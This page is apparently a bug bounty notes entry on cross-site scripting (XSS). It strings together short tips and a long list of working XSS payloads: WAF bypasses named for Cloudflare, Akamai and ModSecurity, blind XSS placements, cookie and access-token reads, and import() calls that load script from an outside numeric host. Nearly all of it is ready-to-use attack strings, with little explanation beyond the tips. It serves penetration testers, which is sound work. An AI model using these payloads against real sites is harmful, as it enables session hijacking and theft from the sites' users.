Cross Site Scripting (XSS)

Self XSS to Stored XSS
If you find jsp page with no parameters. You can actually add path parameters using semicolon Like this http://example.com/test.jsp ;');alert(1)// & perform XSS. Apache tomcat support this. #Bugbountytip #BugBounty #XSS
Bug bounty tip: put a blind XSS payload in your user agent before you fill in a contact form. ;-)
bugbountytip If you get a reflected XSS so that you can only add attributes to a hidden field, DON'T settle for accessKey XSS. Check the JavaScript in the page for any sort of document.getElementById("x").click() functions. If you can get your input to have that ID: ALERT XD
bugbounty #bugbountytip #bugbountytips Sometimes user input is reflected into a value without any quotations. Eg: Just add a space and you can now inject onfocus=alert(0) autofocus for XSS! Works even against htmlspecialchars().
An useful XSS filter bypass technique I use when everything is not working is to take the closing tag off eg. hhh<img src="#" onmouseenter="prompt('XSS')" gggg
Testing a shopping site; Try the XSS payload in order ID parameter once you order an item rather than just an IDOR. They forget to sanitize there coz they are meant to be just numbers ;) #bugbountyTips #XSS
While looking on .js files, try identify the weak places in code. Like, innerHTML indicates there might be XSS.
If you find jsp page with no parameters. You can actually add path parameters using semicolon Like this http://example.com/test.jsp ;');alert(1)// & perform XSS. Apache tomcat support this.
tip for blind xss :- inject bxss payloads in appstore/play store’s app reviews. Many times companies uses third party app review analysis apps. Payload can get trigger on the third party app which can give you access to some sensitive information.
XSS through open redirect - /x:1/:///%01javascript:alert(document.cookie)/
#bugbountytip You can turn an input box into automatic #XSS by setting agnostic payload on the "onfocus" attribute and then setting it to "autofocus". Eg: <input onfocus="alert(0);" autofocus> This will result in automatic XSS (no user interaction).
Use <svg onload=alert(1)> payload as file extension. When extension reflects in html. Sometime developers validate filename and forgot to validate extension.
#bugbountytip Here is a #XSS polyglot: javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert()//>
Split your XSS payload into two like for ex. FName: <img src=x & LName: onerror=prompt(0);> sometimes you will end getting Stored XSS.
#bugbounty tip: to demonstrate XSS impact, don't use alert('alert'). Determine whether session is stored in cookies or local storage and put that in the popup. cookie: alert(document.cookie) LocalStorage: alert(localStorage.getItem('access_token'))
Target[.]com/index.php?xss=<a href=x onfocus=alert(23) name=jj>
I found an endpoint without extension and parameters. response was json. added .html and a parameter with xss payload, resulted in html with xss try it. #bugbounty
When testing for reflected XSS, ignore the "Accept Cookie" pop-up (don't dismiss it or accept it, just ignore it). The pop-up's code might reflect the URL in the source code
Blind xss https://twitter.com/dirtycoder0124/status/1162927865542762496
There are some endpoints show JSON, but forget to set the header to “Content-type: application/json” and leave it as “Content-type: text/html” , and they show special chars , easy XSS ;)
@kunalp94: If you got unvalidated redirect issue, don't just submit it yet, try to trigger reflective XSS, it'll make report more interesting. My favourite payload is javascript://%0aalert(1) or javascript://%250aalert(1) in case of double encoding. :)#bugbounty #hackerone
I just had to break out of a comment to cause XSS during a pentest, if you guys come across this issue try this : --!><Svg/Onload=confirm(document.domain)> it worked for me in this case. #bugbounty #pentesting
#BugBountyTip When you are dealing with XSS try to change the device or user-agent to Mobile you might get it work, in my case the homepage is different in devices the XSS is in username and the payload is Unicode UTF-16

Payloads

<svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//
<svg onload="alert(1)" <="" svg=""
GUYS bypassed cloud flare using this payload
"><x/Onpointerrawupdate=confirm(document.cookie)>kira_deathnote
‟><marquee/onstart=confirm(1)>
"onfocus="alert`1`"autofocus="
Useful #XSS Payloads -
 "><block%quote oncontextmenu%3Dconfirm(1)>Right click me</blockquote><!--
 javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
 XSS
<body ontouchstart=alert(1)>
Triggers when a finger touch the screen
<body ontouchend=alert(1)>
Triggers when a finger is removed from touch screen
<body ontouchmove=alert(1)>
When a finger is dragged across the screen.
$` onerror=alert(1);//
" onfocus="alert(1)" autofocus="

<math><x xlink:href=javascript:confirm`1`>click

HTML INJECTION + XSS INJECTION 

/<div+id=JavaScript>/<h1>_Y000!_

/<div+id=JavaScript>/<marquee>_Y000!_</marquee>

/<div+id=JavaScript>/<marquee onstart=alert`_Y000!_`>_Y000!_</marquee>

𝘾𝙡𝙤𝙪𝙙𝙛𝙡𝙖𝙧𝙚 𝙒𝘼𝙁 𝘽𝙮𝙥𝙖𝙨𝙨 
<img src=x onError=import('//1152848220/')>
𝘼𝙠𝙖𝙢𝙖𝙞 𝙒𝘼𝙁 𝘽𝙮𝙥𝙖𝙨𝙨
<x onauxclick=import('//1152848220/')>click
𝙈𝙤𝙙_𝙎𝙚𝙘𝙪𝙧𝙞𝙩𝙮 𝙒𝘼𝙁 𝘽𝙮𝙥𝙖𝙨𝙨
<x onauxclick=import('//1152848220/')>click
#BugBounty  #bugbountytip

Some payloads that worked for me in popping up a stored XSS:-

1. <img src=`xx:xx`onerror=alert(1)>
2. <div/onmouseover='alert(1)'> style="x:">
3. \";alert('XSS');//
4. "autofocus/onfocus=alert(1)//
5. '-alert(1)-'

Good luck!

xss payload + &NewLine;

<img src=`%00`&NewLine; onerror=alert`_Y000!_`&NewLine;

<a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert`_Y000!_`&NewLine;>_Y000!_</a>

<img src="X" onerror=top[8680439..toString(30)](1337)>

<input onfocus="alert('xss');" autofocus>

#BugBountyTip - Useful #XSS Payloads. Today I used this:
< a href="mailto:a"+/onmouseover=prompt(document.domain)>

PreviousSensitive Information Disclosure NextCRLF

Last updated 9 months ago